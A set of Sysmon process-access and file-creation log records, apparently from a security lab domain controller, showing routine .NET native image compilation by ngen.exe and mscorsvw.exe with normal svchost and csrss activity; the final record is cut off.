{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8188,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.678\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22AE-5F25-0000-001017921000}\r\nTargetProcessId: 4356\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.678","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22AE-5F25-0000-001017921000}","TargetProcessId":"4356","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8189,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.834\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-00106E610F00}\r\nTargetProcessId: 4396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.834","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-00106E610F00}","TargetProcessId":"4396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8190,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.834\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-00106E610F00}\r\nTargetProcessId: 4396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.834","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-00106E610F00}","TargetProcessId":"4396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8191,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:10.834\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-00106E610F00}\r\nTargetProcessId: 4396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:10.834","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-00106E610F00}","TargetProcessId":"4396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8192,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:12.037\r\nProcessGuid: {41C8662E-22AE-5F25-0000-0010F2951000}\r\nProcessId: 4396\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\112c-0\\System.Windows.Controls.Ribbon.dll\r\nCreationUtcTime: 2020-08-01 08:07:12.037","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:12.037","ProcessGuid":"{41C8662E-22AE-5F25-0000-0010F2951000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\112c-0\\System.Windows.Controls.Ribbon.dll","CreationUtcTime":"2020-08-01 08:07:12.037","EventReceivedTime":"2020-08-01 08:07:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8193,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:12.100\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22B0-5F25-0000-00106E9B1000}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:12.100","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22B0-5F25-0000-00106E9B1000}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8194,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:12.100\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22B0-5F25-0000-00106E9B1000}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:12.100","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22B0-5F25-0000-00106E9B1000}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8195,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:12.115\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22B0-5F25-0000-00106E9B1000}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:12.115","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22B0-5F25-0000-00106E9B1000}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8196,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:12.256\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22B0-5F25-0000-0010059F1000}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 